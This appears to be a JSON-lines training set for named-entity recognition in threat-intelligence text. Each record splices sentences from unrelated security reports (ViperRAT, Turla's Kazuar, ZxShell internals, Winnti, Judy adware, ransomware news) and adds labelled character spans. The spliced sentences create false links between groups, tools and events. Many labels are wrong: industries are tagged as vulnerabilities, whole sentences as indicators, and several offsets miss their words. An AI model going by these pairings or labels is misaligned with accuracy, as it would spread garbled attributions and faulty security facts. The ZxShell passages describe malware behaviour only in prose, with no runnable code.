mobile threat ecosystem today . In early 2018 , multiple media claimed that Turla operators used mail attachments to control infected machines . These 2 values , ServiceDll and ServiceDllUnloadOnStop are needed for services that run in a shared process . 
Postintrusion activities include lateral movement , as well as data collection and exfiltration via browserdata theft and a keylogger .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 143, "end": 150, "label": "Organization"}, {"start": 369, "end": 374, "label": "Organization"}, {"start": 474, "end": 484, "label": "System"}, {"start": 489, "end": 511, "label": "System"}]} {"text": "Naming additional payload applications as system updates is a clever technique used by malware authors to trick victims into believing a threat isn \u2019 t present on their device . As detailed in the previous section , this malware is able to manipulate and exfiltrate emails . Before the service is started ChangeServiceConfig is called to modify the service type to shared and interactive . Open Babel allows users to \u201c search , convert , analyze , or store data from molecular modeling , chemistry , solid - state materials , biochemistry , or related areas , \u201d according to its website , and is used in other popular pieces of software in the science field .", "spans": [{"start": 240, "end": 272, "label": "Malware"}, {"start": 390, "end": 400, "label": "System"}]} {"text": "ViperRAT takes this one step further by using its dropper app to identify an appropriate second stage \u2018 update \u2019 that may go unnoticed . To our knowledge , Turla is the only espionage group that currently uses a backdoor entirely controlled by emails , and more specifically via PDF attachments . If the service fails to start then a random service name formatted as netsvc_xxxxxxxx , where xxxxxxxx represent an 8-digit random hex value , is added to the netsvc group and the entire function is repeated . 
TIEDYE ( xpc.protect )", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 279, "end": 294, "label": "System"}, {"start": 456, "end": 462, "label": "System"}, {"start": 507, "end": 529, "label": "Malware"}]} {"text": "For example , if a victim has Viber on their device , it will choose to retrieve the Viber Update second stage . The attackers first infected in March 2017 . This function is the entry point of the service . As nations committed to upholding the rules - based international order in cyberspace , the United States and its allies and partners are taking steps to defend against Russia \u2019s irresponsible actions .", "spans": [{"start": 30, "end": 35, "label": "System"}, {"start": 85, "end": 97, "label": "System"}, {"start": 296, "end": 313, "label": "Organization"}, {"start": 377, "end": 408, "label": "Organization"}]} {"text": "If he doesn \u2019 t have Viber , the generically-named System Updates app gets downloaded and installed instead . Our research shows that compromised organizations are at risk of not only being spied on by the Turla group who planted the backdoor , but also by other attackers . It registers the service using the RegisterServiceCtrlHandler Windows API function . There is an apocryphal story about why he robbed banks .", "spans": [{"start": 337, "end": 344, "label": "System"}]} {"text": "What was taken The actors behind ViperRAT seem to be particularly interested in image data . The developers refer to this tool by the name Kazuar , which is a Trojan written using the Microsoft.NET Framework that offers actors complete access to compromised systems targeted by its operator . The ZxShell service handler routine is only a stub : it responds to each service request code , doing nothing , and finally exits . 
Surprisingly enough , it does not take very long to get some information about Hack520 : someone with this handle runs a blog and a Twitter account ( with a handle close to Hack520 ) that is also directly linked to the blog .", "spans": [{"start": 33, "end": 41, "label": "Malware"}, {"start": 139, "end": 145, "label": "System"}, {"start": 297, "end": 304, "label": "Malware"}, {"start": 504, "end": 511, "label": "Organization"}, {"start": 598, "end": 605, "label": "Organization"}]} {"text": "We were able to identify that 8,929 files had been exfiltrated from compromised devices and that the overwhelming majority of these , 97 percent , were highly likely encrypted images taken using the device camera . We suspect the Kazuar tool may be linked to the Turla threat actor group ( also known as Uroburos and Snake ) , who have been reported to have compromised embassies , defense contractors , educational institutions , and research organizations across the globe . It sets the service status to RUNNING and finally calls the ShellMain function of ZxShell . This campaign has a multi - stage attack chain that begins with a phishing email delivered to victims impersonating CoinPayments , a legitimate global cryptocurrency payment gateway .", "spans": [{"start": 230, "end": 241, "label": "System"}, {"start": 304, "end": 312, "label": "Organization"}, {"start": 317, "end": 322, "label": "Organization"}, {"start": 370, "end": 379, "label": "Organization"}, {"start": 382, "end": 401, "label": "Organization"}, {"start": 404, "end": 428, "label": "Organization"}, {"start": 435, "end": 457, "label": "Organization"}, {"start": 559, "end": 566, "label": "Malware"}]} {"text": "We also observed automatically generated files on the C2 , indicating the actor behind this campaign also issues commands to search for and exfiltrate PDF and Office documents . This is also a full-featured backdoor controlled by email , and which can work independently of any other Turla component . 
The ShellMain function is a stub that relocates the DLL to another buffer and spawns a thread that starts from ShellMainThreadInt at offset +0xC0CD . Through this entry , in which we take a closer look at an individual who we believe might be connected to the Winnti group , we hope to give both ordinary users and organizations better insights into some of the tools \u2013 notably the server infrastructures- these kinds of threat actors use , as well as the scale in which they operate .", "spans": [{"start": 193, "end": 215, "label": "System"}, {"start": 354, "end": 357, "label": "System"}, {"start": 562, "end": 574, "label": "Organization"}, {"start": 598, "end": 612, "label": "Organization"}, {"start": 617, "end": 630, "label": "Organization"}, {"start": 684, "end": 707, "label": "System"}]} {"text": "This should be highly alarming to any government agency or enterprise . A hallmark of Turla operations is iterations of their tools and code lineage in Kazuar can be traced back to at least 2005 . The ShellMainThreadInt function gets the HeapDestroy Windows API address and replaces the first 3 bytes with the RET 4 opcode . 
Therefore , there are cases where these vulnerabilities are accessible via the internet .", "spans": [{"start": 152, "end": 158, "label": "System"}, {"start": 250, "end": 257, "label": "System"}, {"start": 365, "end": 412, "label": "Vulnerability"}]} {"text": "We observed legitimate exfiltrated files of the following types of data : Contact information Compressed recorded audio in the Adaptive Multi-Rate ( amr ) file format Images captured from the device camera Images stored on both internal device and SDCard storage that are listed in the MediaStore Device geolocation information SMS content Chrome browser search history and bookmarks Call log information Cell tower information Device network metadata ; such as phone number , device software version , network country , network operator , SIM country , SIM operator , SIM serial , IMSI , voice mail number , phone If the hypothesis is correct and the Turla threat group is using Kazuar , we believe they may be using it as a replacement for Carbon and its derivatives . Subsequently , it calls the FreeLibrary function to free its own DLL buffer located at its original address . 
\u2022 new UK and US intelligence suggests Russia was behind an operation targeting commercial communications company Viasat in Ukraine \u2022 incident on 24 February caused outages for several thousand Ukrainian customers , and impacted windfarms and internet users in central Europe \u2022 cyber security leaders from the 5 Eyes , EU and other international allies meet at the NCSC \u2019s Cyber UK conference in Newport today to discuss shared threats Russia has been behind a series of cyber - attacks since the start of the renewed invasion of Ukraine , the EU , UK , US and other allies have announced today ( 10 May ) .", "spans": [{"start": 652, "end": 657, "label": "Organization"}, {"start": 680, "end": 686, "label": "System"}, {"start": 742, "end": 748, "label": "System"}, {"start": 836, "end": 839, "label": "System"}, {"start": 887, "end": 909, "label": "Organization"}, {"start": 919, "end": 925, "label": "Organization"}, {"start": 960, "end": 1000, "label": "Organization"}, {"start": 1109, "end": 1118, "label": "Organization"}, {"start": 1123, "end": 1137, "label": "Organization"}, {"start": 1158, "end": 1180, "label": "Organization"}, {"start": 1190, "end": 1196, "label": "Organization"}, {"start": 1199, "end": 1201, "label": "Organization"}, {"start": 1212, "end": 1232, "label": "Organization"}, {"start": 1245, "end": 1272, "label": "Organization"}, {"start": 1308, "end": 1322, "label": "Organization"}]} {"text": "type , network type , data state , data activity , call state , SIM state , whether device is roaming , and if SMS is supported . We used a combination of tools such as NoFuserEx , ConfuserEx Fixer , ConfuserEx Switch Killer , and de4d0t in order to deobfuscate the code for in depth analysis . Because of this , the allocated heaps will not be freed . 
Anonymous Sudan appeared to be a core driver of claimed attacks targeting countries further afield , and it is primarily responsible for the recent surge of Israeli targeting ; however , nearly half of claimed Anonymous Sudan attacks still focused on U.S. or European organizations .", "spans": [{"start": 169, "end": 178, "label": "System"}, {"start": 181, "end": 197, "label": "System"}, {"start": 200, "end": 224, "label": "System"}, {"start": 231, "end": 237, "label": "System"}, {"start": 353, "end": 368, "label": "Organization"}, {"start": 563, "end": 586, "label": "Organization"}, {"start": 604, "end": 634, "label": "Organization"}]} {"text": "Standard browser search history Standard browser bookmarks Device handset metadata ; such as brand , display , hardware , manufacturer , product , serial , radio version , and SDK . Kazuar generates its mutex by using a process that begins with obtaining the MD5 hash of a string \" [username]=>singleton-instance-mutex \" . It re-copies the DLL from the new buffer to the original one using the memcpy function . CL0P used separate zero - days in GoAnywhere MFT and MOVEit Transfer to gain an edge .", "spans": [{"start": 182, "end": 188, "label": "Organization"}, {"start": 189, "end": 208, "label": "Malware"}, {"start": 340, "end": 343, "label": "System"}, {"start": 412, "end": 416, "label": "Organization"}, {"start": 422, "end": 442, "label": "Malware"}, {"start": 446, "end": 460, "label": "System"}, {"start": 465, "end": 480, "label": "System"}]} {"text": "Command and control API calls ViperRAT samples are capable of communicating to C2 servers through an exposed API as well as websockets . The subject is a series of targeted attacks against private companies . Finally , it spawns the main thread that starts at the original location of ShellMainThread procedure , and terminates . 
In October 2019 , ESET published \u201c Operation Ghost \u201d detailing a set of new trojans used by the Dukes , including PolyglotDuke , RegDuke and FatDuke .", "spans": [{"start": 30, "end": 38, "label": "Malware"}, {"start": 189, "end": 206, "label": "Organization"}, {"start": 365, "end": 380, "label": "Organization"}, {"start": 426, "end": 431, "label": "Organization"}, {"start": 444, "end": 456, "label": "Malware"}, {"start": 459, "end": 466, "label": "Malware"}, {"start": 471, "end": 478, "label": "Malware"}]} {"text": "Below is a collection of API methods and a brief description around their purpose . e uncovered the activity of a hacking group which has Chinese origins . At this point , the ZxShell library is no longer linked in the module list of the host process . In other highly successful runs , the actor sent out phony Flash videos directly as email attachments .", "spans": [{"start": 176, "end": 183, "label": "Malware"}]} {"text": "On attribution Media reporting on ViperRAT thus far attributes this surveillanceware tool to Hamas . Also , by creating this type of API access , Turla could use one accessible server as a single point to dump data to and exfiltrate data from . This is important because if any system tool tries to open the host process it will never display the ZxShell DLL . None on the CrowdStrike Falcon \u00ae console and of the market - leading CrowdStrike Falcon \u00ae platform in action .", "spans": [{"start": 34, "end": 42, "label": "Malware"}, {"start": 93, "end": 98, "label": "Organization"}, {"start": 347, "end": 354, "label": "Malware"}, {"start": 355, "end": 358, "label": "System"}, {"start": 373, "end": 391, "label": "System"}, {"start": 430, "end": 448, "label": "System"}]} {"text": "Israeli media published the first reports about the social networking and social engineering aspects of this campaign . 
According to our estimations , this group has been active for several years and specializes in cyberattacks against the online video game industry . This thread implements the main code , responsible for the entire botnet DLL . Up until now , we \u2019ve been relatively lucky \u2013 our most recent examples of social network - based cybercrime reveal threat actors using relatively mild motives ( monetization ) .", "spans": [{"start": 240, "end": 266, "label": "Organization"}, {"start": 335, "end": 341, "label": "Malware"}, {"start": 342, "end": 345, "label": "System"}, {"start": 463, "end": 476, "label": "Organization"}]} {"text": "However it \u2019 s unclear whether organizations that later reported on ViperRAT performed their own independent research or simply based their content on the original Israeli report . Based on our analysis , we believe that threat actors may compile Windows and Unix based payloads using the same code to deploy Kazuar against both platforms . First , it checks if the DLL is executed as a service . Adversaries may utilize command - line interfaces ( CLIs ) to interact with systems and execute commands .", "spans": [{"start": 68, "end": 76, "label": "Malware"}, {"start": 309, "end": 315, "label": "Organization"}, {"start": 366, "end": 369, "label": "System"}]} {"text": "Hamas is not widely known for having a sophisticated mobile capability , which makes it unlikely they are directly responsible for ViperRAT . The group 's main objective is to steal source codes . If so , it spawns the service watchdog thread . 
Wall to Wall reached out in July 2022 about collaborating with Bullock after KrebsOnSecurity published A Retrospective on the 2015 Ashley Madison Breach .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 131, "end": 139, "label": "Malware"}, {"start": 227, "end": 235, "label": "System"}, {"start": 245, "end": 257, "label": "Organization"}, {"start": 308, "end": 315, "label": "Organization"}, {"start": 322, "end": 337, "label": "Organization"}, {"start": 376, "end": 397, "label": "Organization"}]} {"text": "ViperRAT has been operational for quite some time , with what appears to be a test application that surfaced in late 2015 . In 2010 HBGary investigated an information security incident related to the Winnti group at one of HBGary 's customers \u2013 an American video game company . The watchdog thread checks the registry path of the ZxShell service every 2 seconds , to verify that it has n\u2019t been modified . What the team uncovered was that the former MiniDuke attackers were still active , and using extremely effective social engineering techniques involving sending malicious PDF documents to compromise their victims .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 132, "end": 138, "label": "Organization"}, {"start": 223, "end": 229, "label": "Organization"}, {"start": 248, "end": 275, "label": "Organization"}, {"start": 282, "end": 290, "label": "System"}, {"start": 330, "end": 337, "label": "Malware"}, {"start": 439, "end": 468, "label": "Organization"}]} {"text": "Many of the default strings in this application are in Arabic , including the name . In 2010 US-based HBGary investigated an information security incident related to the Winnti group at one of HBGary 's customers \u2013 an American video game company . If a user or an application modifies the ZxShell service registry key , the code restores the original infected service key and values . 
The majority of the Excel campaigns show some element of luring the user to enable macros in Excel with specific content using Ukrainian language .", "spans": [{"start": 102, "end": 108, "label": "Organization"}, {"start": 193, "end": 199, "label": "Organization"}, {"start": 227, "end": 245, "label": "Organization"}, {"start": 289, "end": 296, "label": "Malware"}, {"start": 401, "end": 420, "label": "Organization"}]} {"text": "It is unclear whether this means early samples were targeting Arabic speakers or if the developers behind it are fluent in Arabic . For a long time the Winnti group had been considered as a Chinese threat actor targeting gaming companies specifically . The buffer containing the ZxShell Dll in the new location is freed using the VirtualFree API function . FREEFIRE communicates to a hard - coded channel to retrieve commands and upload responses .", "spans": [{"start": 152, "end": 164, "label": "Organization"}, {"start": 221, "end": 237, "label": "Organization"}, {"start": 279, "end": 286, "label": "Malware"}, {"start": 287, "end": 290, "label": "System"}, {"start": 357, "end": 365, "label": "Malware"}]} {"text": "This leads us to believe this is another actor . In April Novetta released its excellent report on the Winnti malware spotted in the operations of Axiom group . A handle to the DLL file is taken in order to make its deletion more difficult . None Read about adversaries tracked by CrowdStrike in 2021 in the and in the \u2022 None Learn more about how can help your organization prepare to defend against sophisticated threats , respond and recover from incidents with speed and precision , and fortify your cybersecurity practices .", "spans": [{"start": 58, "end": 65, "label": "Organization"}, {"start": 103, "end": 117, "label": "System"}, {"start": 177, "end": 180, "label": "System"}, {"start": 281, "end": 292, "label": "Organization"}]} {"text": "What this means for you All Lookout customers are protected from this threat . 
The Axiom group has been presented as an advanced Chinese threat actor carrying out cyber-espionage attacks against a whole range of different industries . The ZxShell mutex is created named @_ZXSHELL_@ . The file c018c54eff8fd0b9be50b5d419d80f21 ( r3_iec104_control.py ) imports the \" iec104_mssql_lib \" module , which is contained within the extracted contents as adfa40d44a58e1bc909abca444f7f616 ( iec104_mssql_lib.pyc ): 2b86adb6afdfa9216ef8ec2ff4fd2558 ( iec104_mssql_lib.py ) implements PIEHOP \u2019s primary capabilities and contains many developer - supplied comments for the included code .", "spans": [{"start": 28, "end": 35, "label": "Organization"}, {"start": 83, "end": 88, "label": "Organization"}, {"start": 239, "end": 246, "label": "System"}, {"start": 284, "end": 558, "label": "Malware"}, {"start": 572, "end": 581, "label": "Malware"}, {"start": 607, "end": 672, "label": "Indicator"}]} {"text": "However , the existence of threats like ViperRAT and Pegasus , the most sophisticated piece of mobile surveillanceware we \u2019 ve seen to date , are evidence that attackers are targeting mobile devices . this library includes two drivers compiled on August 22 and September 4 , 2014 . ZxShell plugins are parsed and loaded with the AnalyseAndLoadPlugins function . OilRig uses two initial access vectors spearphishing and through ITbrain , which is a remote administration software , used in conjunction with the remote access tool TeamViewer .", "spans": [{"start": 40, "end": 48, "label": "Malware"}, {"start": 53, "end": 60, "label": "Malware"}, {"start": 282, "end": 289, "label": "Malware"}, {"start": 362, "end": 368, "label": "Organization"}, {"start": 427, "end": 434, "label": "System"}, {"start": 529, "end": 539, "label": "System"}]} {"text": "Mobile devices are at the frontier of cyber espionage , and other criminal motives . 
Also our visibility as a vendor does not cover every company in the world ( at least so far ; ) ) and the Kaspersky Security Network ( KSN ) did not reveal other attacks except those against gaming companies . The plugin registry key HKLM\\SYSTEM\\CurrentControlSet\\Control\\zxplug is opened and each value is queried . RA Group , in its ongoing campaigns , has targeted the U.S. , South Korea , Taiwan , the U.K. and India across several business verticals , including manufacturing , wealth management , insurance providers , pharmaceuticals and financial management consulting companies .", "spans": [{"start": 191, "end": 217, "label": "Organization"}, {"start": 220, "end": 223, "label": "Organization"}, {"start": 276, "end": 292, "label": "Organization"}, {"start": 402, "end": 410, "label": "Organization"}, {"start": 453, "end": 461, "label": "Organization"}, {"start": 464, "end": 475, "label": "Organization"}, {"start": 478, "end": 484, "label": "Organization"}, {"start": 491, "end": 495, "label": "Organization"}, {"start": 500, "end": 505, "label": "Organization"}, {"start": 521, "end": 539, "label": "Vulnerability"}, {"start": 552, "end": 565, "label": "Vulnerability"}, {"start": 568, "end": 585, "label": "Vulnerability"}, {"start": 588, "end": 607, "label": "Vulnerability"}, {"start": 610, "end": 671, "label": "Vulnerability"}]} {"text": "Enterprise and government employees all use these devices in their day-to-day work , which means IT and security leaders within these organizations must prioritize mobile in their security strategies . Conversely , LokiBot and Agent Tesla are new malware tools . The registry value contains the plugin file name . 
This can lead to a ransom situation where hackers demand money from the company in exchange for not releasing their data onto the internet or for unlocking their systems .", "spans": [{"start": 215, "end": 222, "label": "System"}, {"start": 227, "end": 238, "label": "System"}]} {"text": "Check Point researchers discovered another widespread malware campaign on Google Play , Google \u2019 s official app store . Based on multiple active compromises by the Axiom threat group , Novetta was able to capture and analyze new Winnti malware samples . The target file is loaded using the LoadLibrary API function , and the address of the exported function zxMain is obtained with GetProcAddress . Ransomware gangs are consistently rebranding or merging with other groups , as highlighted in our 2022 Year in Review , or these actors work for multiple ransomware - as - a - service ( RaaS ) outfits at a time , and new groups are always emerging .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 74, "end": 85, "label": "System"}, {"start": 88, "end": 94, "label": "Organization"}, {"start": 185, "end": 192, "label": "Organization"}, {"start": 229, "end": 251, "label": "System"}, {"start": 553, "end": 591, "label": "Malware"}]} {"text": "The malware , dubbed \u201c Judy \u201d , is an auto-clicking adware which was found on 41 apps developed by a Korean company . Initial attack targets are commonly software and gaming organizations in United States , Japan , South Korea , and China . If the target filename is incorrect or invalid the plugin file is deleted and the registry value is erased . 
First , the discovery of new OT malware presents an immediate threat to affected organizations , since these discoveries are rare and because the malware principally takes advantage of insecure by design features of OT environments that are unlikely to be remedied any time soon .", "spans": [{"start": 23, "end": 27, "label": "Malware"}, {"start": 167, "end": 187, "label": "Organization"}, {"start": 379, "end": 389, "label": "Malware"}]} {"text": "The malware uses infected devices to generate large amounts of fraudulent clicks on advertisements , generating revenues for the perpetrators behind it . Initial attack targets are commonly software and gaming organizations in United States , Japan , South Korea , and China . That is performed by the function DeleteAndLogPlugin . Using differential firmware analysis , we identified the vulnerable endpoint and developed a PoC to validate the vulnerability .", "spans": [{"start": 203, "end": 223, "label": "Organization"}, {"start": 385, "end": 460, "label": "Indicator"}]} {"text": "The malicious apps reached an astonishing spread between 4.5 million and 18.5 million downloads . The samples Novetta obtained from the active Axiom infection were compiled in mid- to late 2014 and represent what Novetta is referring to as version 3.0 of the Winnti lineage . Otherwise , the plugin is added to an internal list . 
The directory choices and naming conventions of the Ruby script and second stage payloads indicated the threat actor placed significant priority into masquerading as legitimate files and applications .", "spans": [{"start": 110, "end": 117, "label": "Organization"}, {"start": 213, "end": 220, "label": "Organization"}, {"start": 259, "end": 265, "label": "Organization"}, {"start": 382, "end": 393, "label": "Malware"}, {"start": 398, "end": 419, "label": "Malware"}, {"start": 430, "end": 531, "label": "Indicator"}]} {"text": "Some of the apps we discovered resided on Google Play for several years , but all were recently updated . We assess with high confidence that the Winnti umbrella is associated with the Chinese state intelligence apparatus , with at least some elements located in the Xicheng District of Beijing . The thread KeyloggerThread is spawned and is responsible for doing keylogging on the target workstation . None Use of Python for malware development and/or packaging : We expect to continue to observe attackers compiling or packaging their OT malware via methods such as PyInstaller ( IRONGATE ) or Py2Exe ( TRITON ) given the proliferation of OT malware developed or packaged using Python in recent years .", "spans": [{"start": 42, "end": 53, "label": "System"}, {"start": 308, "end": 323, "label": "Organization"}, {"start": 415, "end": 421, "label": "System"}, {"start": 498, "end": 507, "label": "Organization"}, {"start": 537, "end": 547, "label": "Malware"}, {"start": 568, "end": 579, "label": "System"}, {"start": 582, "end": 590, "label": "Malware"}, {"start": 596, "end": 602, "label": "System"}, {"start": 605, "end": 611, "label": "Malware"}, {"start": 641, "end": 651, "label": "Malware"}, {"start": 680, "end": 686, "label": "System"}]} {"text": "It is unclear how long the malicious code existed inside the apps , hence the actual spread of the malware remains unknown . The Winnti umbrella continues to operate highly successfully in 2018 . 
We will take a look at the keylogger later on . Enable robust application logging for MicroSCADA and aggregate logs to a central location .", "spans": [{"start": 223, "end": 232, "label": "System"}]} {"text": "We also found several apps containing the malware , which were developed by other developers on Google Play . The Winnti umbrella and closely associated entities has been active since at least 2009 . Finally the main network communication function GetIpListAndConnect is called . The strings are obfuscated using the stack and simple Bitwise operation .", "spans": [{"start": 96, "end": 107, "label": "System"}, {"start": 280, "end": 291, "label": "System"}]} {"text": "The connection between the two campaigns remains unclear , and it is possible that one borrowed code from the other , knowingly or unknowingly . The Winnti and Axiom group names were created by Kaspersky Lab and Symantec , respectively , for their 2013/2014 reports on the original group . This function is at the core of the RAT \u2019s network communication . Other interesting anomalies in June include 47 attacks on the Manufacturing industry ( which usually averages around 20 attacks a month ) and notable increases in attacks on Switzerland ( 14 ) and Brazil ( 13 ) , both of which are normally attacked only two or three times a month .", "spans": [{"start": 149, "end": 155, "label": "Organization"}, {"start": 166, "end": 171, "label": "Organization"}, {"start": 194, "end": 207, "label": "Organization"}, {"start": 212, "end": 220, "label": "Organization"}, {"start": 326, "end": 329, "label": "System"}, {"start": 419, "end": 441, "label": "Organization"}]} {"text": "The oldest app of the second campaign was last updated in April 2016 , meaning that the malicious code hid for a long time on the Play store undetected . Their operations against gaming and technology organizations are believed to be economically motivated in nature . 
It starts by initializing a random number generator and reading 100 bytes inside the ZxShell Dll at a hardcoded location . Using tools that are more lightweight and generic than those observed in prior OT incidents , the actor likely decreased the time and resources required to conduct a cyber physical attack .", "spans": [{"start": 130, "end": 140, "label": "System"}, {"start": 179, "end": 185, "label": "Organization"}, {"start": 190, "end": 214, "label": "Organization"}, {"start": 354, "end": 361, "label": "Malware"}, {"start": 362, "end": 365, "label": "System"}]} {"text": "These apps also had a large amount of downloads between 4 and 18 million , meaning the total spread of the malware may have reached between 8.5 and 36.5 million users . However , based on the findings shared in this report we assess with high confidence that the actor 's primary long-term mission is politically focused . These bytes are XOR encrypted with the byte-key 0x85 and contains a list of remote hosts where to connect . If you can not apply the KB5019758 patch immediately , you should disable OWA until the patch can be applied .", "spans": []} {"text": "Similar to previous malware which infiltrated Google Play , such as FalseGuide and Skinner , Judy relies on the communication with its Command and Control server ( C & C ) for its operation . The Winnti umbrella and linked groups' initial targets are gaming studios and high tech businesses . The data is decrypted , the remote host list is parsed and verified using the BuildTargetIpListStruct function . 
So , when LockBit , the most active ransomware group in the world , is hitting three times as many victims as the next most active gang , you need to know how to prepare .", "spans": [{"start": 46, "end": 57, "label": "System"}, {"start": 68, "end": 78, "label": "Malware"}, {"start": 83, "end": 90, "label": "Malware"}, {"start": 251, "end": 265, "label": "Organization"}, {"start": 270, "end": 290, "label": "Organization"}, {"start": 416, "end": 423, "label": "Organization"}, {"start": 442, "end": 458, "label": "Organization"}]} {"text": "After Check Point notified Google about this threat , the apps were swiftly removed from the Play store . During the same time period , we also observed the actor using the Browser Exploitation Framework ( BeEF ) to compromise victim hosts and download Cobalt Strike . There are 3 types of lists recognized by ZxShell : plain ip addresses , HTTP and FTP addresses . Cisco Secure Firewall ( formerly Next - Generation Firewall and Firepower NGFW ) appliances such as Threat Defense Virtual , Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat .", "spans": [{"start": 6, "end": 17, "label": "Organization"}, {"start": 27, "end": 33, "label": "Organization"}, {"start": 93, "end": 103, "label": "System"}, {"start": 253, "end": 266, "label": "System"}, {"start": 310, "end": 317, "label": "Malware"}, {"start": 341, "end": 345, "label": "Indicator"}, {"start": 350, "end": 353, "label": "Indicator"}, {"start": 366, "end": 387, "label": "System"}, {"start": 399, "end": 444, "label": "System"}, {"start": 466, "end": 488, "label": "System"}]} {"text": "How Judy operates : To bypass Bouncer , Google Play \u2019 s protection , the hackers create a seemingly benign bridgehead app , meant to establish connection to the victim \u2019 s device , and insert it into the app store . In this campaign , the attackers experimented with publicly available tooling for attack operations . 
If the list does not contain any item , or if the verification has failed , the ZxShell sample tries to connect to a hardcoded host Budworm is a longrunning APT group that is believed to have been active since at least 2013 .", "spans": [{"start": 4, "end": 8, "label": "Malware"}, {"start": 30, "end": 37, "label": "System"}, {"start": 40, "end": 51, "label": "System"}, {"start": 267, "end": 293, "label": "System"}, {"start": 398, "end": 405, "label": "Malware"}, {"start": 450, "end": 457, "label": "Organization"}, {"start": 475, "end": 484, "label": "Organization"}]} {"text": "Once a user downloads a malicious app , it silently registers receivers which establish a connection with the C & C server . The primary goal of these attacks was likely to find code-signing certificates for signing future malware . with the goal of retrieving a new updated list . Danbot , Shark , and Milan use both DNS and HTTPS for C2 communications , while Marlin uses the OneDrive API for C2 communications .", "spans": [{"start": 282, "end": 288, "label": "Malware"}, {"start": 291, "end": 296, "label": "Malware"}, {"start": 303, "end": 308, "label": "Malware"}, {"start": 318, "end": 321, "label": "System"}, {"start": 326, "end": 331, "label": "System"}, {"start": 336, "end": 353, "label": "System"}, {"start": 362, "end": 368, "label": "Malware"}, {"start": 378, "end": 390, "label": "System"}, {"start": 395, "end": 412, "label": "System"}]} {"text": "The server replies with the actual malicious payload , which includes JavaScript code , a user-agent string and URLs controlled by the malware author . The Chinese intelligence apparatus has been reported on under many names , including Winnti , PassCV , APT17 , Axiom , LEAD , BARIUM , Wicked Panda , and GREF . Otherwise , ZxShell tries to connect to the first item of the list . 
This allows application control solutions to block unknown threats .", "spans": [{"start": 325, "end": 332, "label": "Malware"}]} {"text": "The malware opens the URLs using the user agent that imitates a PC browser in a hidden webpage and receives a redirection to another website . The attackers behind observed activity in 2018 operate from the Xicheng District of Beijing via the net block 221.216.0.0/13 . If ZxShell successfully connects to the remote host , the function DoHandshake is called . As 2021 ends , one critical theme remains constant within the world of enterprise security ransomware attacks are continuing to rise , yearoveryear , across private and public entities .", "spans": [{"start": 273, "end": 280, "label": "Malware"}, {"start": 518, "end": 545, "label": "Organization"}]} {"text": "Once the targeted website is launched , the malware uses the JavaScript code to locate and click on banners from the Google ads infrastructure . ALLANITE activity closely resembles Palmetto Fusion described by the US Department of Homeland Security ( DHS ) . This function implements the initial handshake which consists of exchanging 16 bytes , 0x00001985 and 0x00000425, Iranian officials state the delegations agreed that good progress was made during the seventh round that ended 10 days earlier , and there is now a suitable framework to take the talks forward .", "spans": [{"start": 117, "end": 127, "label": "System"}, {"start": 217, "end": 248, "label": "Organization"}, {"start": 251, "end": 254, "label": "Organization"}, {"start": 373, "end": 390, "label": "Organization"}]} {"text": "Upon clicking the ads , the malware author receives payment from the website developer , which pays for the illegitimate clicks and traffic . ALLANITE activity closely resembles Palmetto Fusion described by the US Department of Homeland Security . with the server . 
This is analogous to antivirus solutions using known virus signatures to determine if a computing interaction suggests virus installation or malware delivery across the network .", "spans": [{"start": 214, "end": 245, "label": "Organization"}]} {"text": "The JavaScript code locates the targeted ads by searching for iframes which contain ads from Google ads infrastructure , as shown in the image below : The fraudulent clicks generate a large revenue for the perpetrators , especially since the malware reached a presumably wide spread . ALLANITE uses email phishing campaigns and compromised websites called watering holes to steal credentials and gain access to target networks , including collecting and distributing screenshots of industrial control systems . The function GetLocalPcDescrStr is used to compose a large string that contains system information of the target workstation . Cisco Talos recently worked with two vendors to patch multiple vulnerabilities in a favored software library used in chemistry laboratories and the Foxit PDF Reader , one of the most popular PDF reader alternatives to Adobe Acrobat .", "spans": [{"start": 93, "end": 103, "label": "System"}, {"start": 328, "end": 348, "label": "System"}, {"start": 638, "end": 649, "label": "Organization"}, {"start": 786, "end": 802, "label": "System"}, {"start": 829, "end": 839, "label": "Organization"}, {"start": 856, "end": 869, "label": "Organization"}]} {"text": "Who is behind Judy ? In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group Symantec calls Dragonfly ( which Dragos associates with DYMALLOY ) . The string is sent to the remote host and the response is checked to see if the first byte of the response is 0xF4, an arbitrary byte . 
The form also contains legitimate macro code modified by the attacker to call malicious subroutines .", "spans": [{"start": 14, "end": 18, "label": "Malware"}, {"start": 41, "end": 44, "label": "Organization"}, {"start": 131, "end": 139, "label": "Organization"}, {"start": 164, "end": 170, "label": "Organization"}]} {"text": "The malicious apps are all developed by a Korean company named Kiniwini , registered on Google Play as ENISTUDIO corp . In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group . If it is , the botnet connection I/O procedure is called through the MainConnectionIo function . The cyber espionage campaign has been attributed to Iranian APT MuddyWater aka Static Kitten and is reported to be actively ongoing , targeting government agencies , as well as entities in the sectors of tourism and academia , within countries including the UAE , Saudi Arabia , and Israel .", "spans": [{"start": 63, "end": 71, "label": "Organization"}, {"start": 88, "end": 99, "label": "System"}, {"start": 103, "end": 117, "label": "Organization"}, {"start": 140, "end": 143, "label": "Organization"}, {"start": 247, "end": 253, "label": "Malware"}, {"start": 333, "end": 357, "label": "Organization"}, {"start": 381, "end": 403, "label": "Organization"}, {"start": 408, "end": 421, "label": "Organization"}, {"start": 473, "end": 492, "label": "Organization"}, {"start": 506, "end": 553, "label": "Organization"}]} {"text": "The company develops mobile apps for both Android and iOS platforms . We assess with high confidence that the attackers discussed here are associated with the Chinese state intelligence apparatus . Otherwise , the ZxShell code closes the socket used and sleeps for 30 seconds . 
